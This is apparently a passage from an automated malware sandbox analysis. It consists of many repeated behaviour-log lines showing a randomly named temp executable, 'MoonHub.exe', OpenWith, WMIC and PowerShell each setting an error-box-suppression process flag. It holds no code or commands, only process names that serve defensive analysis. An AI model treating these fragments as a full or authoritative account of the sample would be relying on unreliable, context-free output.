                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
